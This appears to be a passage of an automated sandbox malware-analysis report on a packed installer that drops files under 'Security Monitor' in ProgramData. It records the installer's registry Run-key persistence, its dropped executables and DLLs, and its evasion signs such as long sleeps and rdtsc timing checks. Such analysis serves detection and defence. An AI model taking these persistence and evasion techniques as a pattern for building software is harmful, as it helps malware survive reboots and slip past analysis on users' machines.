Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0086524C push 008652D7h; ret 56_2_008652CF
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0086D586 push ebx; ret 56_2_0086D587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_00865188 push 00865230h; ret 56_2_00865228
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_008675AC push 008675D9h; ret 56_2_008675D1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0086D3D6 push cs; iretd 56_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_00865DFC push 00865E74h; ret 56_2_00865E6C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_00867550 push 0086759Ah; ret 56_2_00867592
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_007B16A4 push 007B17DEh; ret 56_2_007B17D6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_033CE001 push eax; ret 56_2_033CE108
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_033CE001 push 033B4EC0h; ret 56_2_033CE5D1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337C310 push 0337C37Fh; ret 56_2_0337C377
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337F344 push 0337F3A1h; ret 56_2_0337F399
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337C390 push 0337C3BCh; ret 56_2_0337C3B4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337C388 push 0337C3BCh; ret 56_2_0337C3B4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_03375BF8 push 03375C5Dh; ret 56_2_03375C55
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337C3C8 push 0337C3F4h; ret 56_2_0337C3EC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0338110C push ecx; mov dword ptr [esp], eax 56_2_03381111
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337D1FC push 0337D228h; ret 56_2_0337D220
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337D1FA push 0337D228h; ret 56_2_0337D220
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337C1D0 push 0337C30Dh; ret 56_2_0337C305
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0337573D push eax; ret 56_2_03375779
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_03375F2C push 03375F58h; ret 56_2_03375F50
Source: [space]= .exe.6.dr Static PE information: section name: .text entropy: 7.81759162350406
Source: is-9U2JI.tmp.22.dr Static PE information: section name: entropy: 7.970560832581065
Source: is-9U2JI.tmp.22.dr Static PE information: section name: entropy: 7.995359849273399
Source: is-9U2JI.tmp.22.dr Static PE information: section name: entropy: 7.98989686324796
Source: is-9U2JI.tmp.22.dr Static PE information: section name: entropy: 7.581553890924904
Source: is-9U2JI.tmp.22.dr Static PE information: section name: entropy: 7.998441689187187
Source: is-9U2JI.tmp.22.dr Static PE information: section name: .d entropy: 7.923610064617086
Source: is-719F1.tmp.22.dr Static PE information: section name: entropy: 7.972249623981622
Source: is-719F1.tmp.22.dr Static PE information: section name: entropy: 7.99458999281375
Source: is-719F1.tmp.22.dr Static PE information: section name: entropy: 7.992015849394924
Source: is-719F1.tmp.22.dr Static PE information: section name: entropy: 7.515192733866904
Source: is-719F1.tmp.22.dr Static PE information: section name: entropy: 7.998936896615619
Source: is-719F1.tmp.22.dr Static PE information: section name: .rsrc entropy: 7.953583660494071
Source: is-719F1.tmp.22.dr Static PE information: section name: .data entropy: 7.561972396742998

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\webbrowser.dll
Source: C:\Windows\System32\curl.exe File created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JLPKJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_setup64.tmp
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe File created: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HNNTE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-719F1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1I5NJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H780M.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EO3DV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NNSLF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-GD8FS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (11 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (121 identical entries)

Malware Analysis System Evasion

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Memory allocated: 11B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Memory allocated: 2EF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Memory allocated: 2CF0000 memory reserve | memory write watch
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0339B8B0 rdtsc 56_2_0339B8B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (11 identical entries)
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4349
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Window / User API: threadDelayed 4955
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Window / User API: threadDelayed 4852
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7773
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1803
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7675
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1907
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7496
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7051
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2577
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7275
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7317
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2311
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7705
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3819
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2845
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7871
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1569
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_setup64.tmp
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HNNTE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1I5NJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\webbrowser.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H780M.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NNSLF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe API coverage: 7.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep count: 5421 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800 Thread sleep count: 4349 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe TID: 8072 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe TID: 8140 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8064 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 964 Thread sleep count: 7773 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6052 Thread sleep count: 1803 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3580 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364 Thread sleep count: 7675 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364 Thread sleep count: 1907 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4668 Thread sleep count: 7496 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4668 Thread sleep count: 2007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 768 Thread sleep count: 7051 > 30
